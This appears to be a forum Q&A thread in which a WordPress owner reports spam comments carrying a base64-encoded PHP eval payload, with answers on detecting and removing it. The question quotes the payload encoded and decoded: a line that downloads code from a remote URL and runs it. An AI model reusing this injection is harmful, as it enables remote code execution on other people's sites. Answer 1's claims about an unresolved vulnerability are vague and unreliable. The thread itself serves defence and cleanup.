Eval Base64 virus Wordpress

Question

I'm using a wordpress blog today i got a comment like this .

<!-- unsafe comment zapped --> eval(base64_decode("JGRhdGEgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9zMy5hbWF6b25hd3MuY29tL3dvcmRwcmVzcy1jb3JlL3VwZGF0ZS1mcmFtZXdvcmsudHh0Iik7ZXZhbCgkZGF0YSk7")); --&gt;<!--/mfunc-->

When i've decoded this comment using decoder i got

$data = file_get_contents("https://s3.amazonaws.com/wordpress-core/update-framework.txt");eval($data);

I'm getting many comments like this . Can anyone help me to resolve this problem .? Is it a Hack or does it shows the beginning of hacking ?

Answer 1

It is a hack or at least an attempt. They are taking advantage of an unresolved wordpress vulnerability that can allow them to download and executing code among other things. This type of attack has very little public exposure at the moment on the web and can be particularly nasty if it is originating from an educated source. If you notice these type of code snippets around your server side then please do more research to determine if you are truly infected and if so, to what level the infection has actually gone. I have seen entire shared hosting servers infected from individual wordpress site admins either allowing via ignorance or actively helping this problem propagate. Unfortunately this particular problem is currently not very well documented on the web so you will likely have to do a good bit of research to be sure your site is OK. To help you research I'll clarify the terminology of this hack.

This is a PHP Code Injection attack that is most likely attempting to exploit a known vulnerability in the wordpress framework. It is using Base64 encoded PHP code to inject itself onto your hosting server via eval() which is a programming language construct that is present in nearly all programming languages, including PHP. Hacker's with extremely organized and advanced abilities have made use of this exploit recently to wreak absolute havoc on compromised wordpress sites so be extremely careful when handling this type of problem.

Answer 2

None of the suggestions worked for us. The following is how we removed malicious code from multiple wordpress sites without any downtime.

We ran into a problem where we had multiple legacy wordpress sites sharing one filesystem that was infiltrated by this virus.

We ended up writing a little python script to traverse our filesystem and detect the malicious code.

Here's the code for anyone interested (NOTE: USE AT OWN RISK): https://github.com/michigan-com/eval_scrubber

pip install eval_scrubber
// finds all infected files, will not do anything but READ
python -m eval_scrubber find .
// attempts to remove malicious code from files, potentially dangerous because it WRITEs
python -m eval_scrubber remove .

That scripts will scan the filesystem for malicious content and as a separate command it will attempt to remove the base64 eval functions.

This is really a temporary solution because the generator of this virus uses PHP comments to cause the regex to not match. We ended up using auditd to monitor what file is writing to a file we knew was getting infected: http://www.cyberciti.biz/tips/linux-audit-files-to-see-who-made-changes-to-a-file.html

Once we found the generator of the virus, did one more eval_scrubber remove and then our problem was fixed.

Answer 3

I was searching for a good and fast solution. This will help you find which files are infected with eval64. Then you can use search/replace in Dreamweaver and remove it from all files at once.

Threat scan plugin

BUT

There was an index file with short 2 lines of code. That 2 lines were injecting eval over and over. I forgot which index.php it was but look in folders:

• wp-admin
• wp-content
• wp-include

Try to search for md5 in your files using Dreamweaver.

Hope you'll be able to fix it.